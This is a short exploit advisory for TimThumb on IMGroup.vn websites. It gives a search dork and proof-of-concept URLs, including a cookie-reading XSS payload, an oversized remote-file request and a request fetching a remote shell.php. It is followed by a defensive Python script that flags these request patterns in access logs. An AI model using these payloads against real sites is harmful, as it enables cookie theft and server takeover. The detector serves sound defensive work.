IMGroup.vn Workshop CSS Vulnerability

Published: 2017.08.04
Credit: MaLeets
Risk: Low
CWE: N/A
CVE: N/A
Local: No
Remote: Yes
Dork: "generator" content="imgroup.vn"

# Exploit Title: IMGroup.vn Workshop CSS Vulnerability
# Author: MaLeets
# Date: 4 August 2017
# Tested on: Windows 7

https://localhost/timthumb.php
Vulnerability? TimThumb OK.

Proof of concept (PoC)
https://localhost/timthumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
https://localhost/timthumb.php?src=http://
https://localhost/timthumb.php?src=http://www.example.com/big_file&h=1&w=1
https://localhost/timthumb.php?src=http://www.example.com/shell.php
etc TimThumb exploit bro.

Kam007 (MaLeets Security)
Indonesian Freedom Security :*
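
The PoC requests above come in two shapes: markup inside the `src` parameter, and a remote URL in `src` (including ones that do not point to an image). As an added example, not part of the original advisory, the following check flags those shapes in web server access logs. It assumes combined-log-format lines; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request target inside a combined-log-format line (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif")

def classify_src(request_target):
    """Return the reasons a timthumb.php request matches the advisory's PoC shapes."""
    parts = urlsplit(request_target)
    if not parts.path.lower().endswith("/timthumb.php"):
        return []
    reasons = []
    # parse_qs percent-decodes values, so %3C...%3E is seen as <...>.
    for src in parse_qs(parts.query, keep_blank_values=True).get("src", []):
        lowered = src.lower()
        if "<" in src or ">" in src:
            reasons.append("markup-in-src")
        if re.match(r"^(https?|ftp):", lowered) or lowered.startswith("//"):
            reasons.append("remote-src")
            if not urlsplit(lowered).path.endswith(IMAGE_EXT):
                reasons.append("remote-src-not-image")
    return reasons

def scan_log(lines):
    """Return (request_target, reasons) for every flagged log line."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if match:
            reasons = classify_src(match.group(1))
            if reasons:
                hits.append((match.group(1), reasons))
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [04/Aug/2017:10:00:00 +0000] '
    '"GET /timthumb.php?src=/uploads/photo.jpg&w=100&h=100 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [04/Aug/2017:10:00:05 +0000] '
    '"GET /timthumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg HTTP/1.1" 400 312',
    '203.0.113.9 - - [04/Aug/2017:10:00:09 +0000] '
    '"GET /timthumb.php?src=http://www.example.com/shell.php HTTP/1.1" 400 298',
]

if __name__ == "__main__":
    for target, reasons in scan_log(SAMPLE_LOG):
        print(", ".join(reasons), "<-", target)
```
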



Copyright 2017, cxsecurity.com